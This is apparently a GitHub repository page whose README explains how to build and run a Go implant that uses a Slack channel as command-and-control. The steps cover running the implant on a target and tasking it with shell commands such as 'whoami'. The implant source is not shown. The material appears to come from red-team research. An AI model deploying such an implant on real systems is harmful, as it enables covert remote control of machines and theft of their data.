Skip to content
Slack C2bot that executes commands and returns the output.
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md
build.sh Add files via upload Apr 18, 2019
implant.go

README.md

Slack C2bot

Slack C2bot that executes commands and returns the output.

Learn more by reading our full writeup: Using Slack as a Malicious C2 Vector: MITRE ATT&CK – Web Service (T1102)

Setup

Install Golang and requirements:

sudo apt install golang-go
sudo apt install git

Install the Slack library:

go get "github.com/nlopes/slack"

Usage

./build.sh [$CHANID] [$SLACKTOKEN]

The build script will generate a UUID for your bot.

If you dont already have a workspace you will need to create one.

Once you have a workspace, open a channel and note the channel id. This can be found by opening the channel in your browser. The uri is /messages/channelid/.

Save this as $CHANID.

Next, you will need to add a bot to your workspace. This can be done using the following steps:

  • Open https://api.slack.com/
  • Click Start building. Enter the name of the bot and the workspace.
  • On the left menu listing, click: OAuth & Permissions
  • Scroll down to Scopes. Add channels:history and chat:write:bot permissions.
  • Click save.
  • Scroll to the top of the page and click Install App to Workspace.
  • Click authorize on the new popup.

Slack OAuth Token. This can be found by opening Your Apps -> Click the bot -> OAuth & Permissions.

Save this as $SLACKTOKEN.

Run the build script.

./build.sh $CHANID $SLACKTOKEN

Run the Slack c2 bot on the target system.

./output/lin_implant.bin

Open the Slack channel.

After the bot checks-in, you can task the bot to execute a command using the following syntax:

[UUID] run whoami

The bot will post the output.

You can’t perform that action at this time.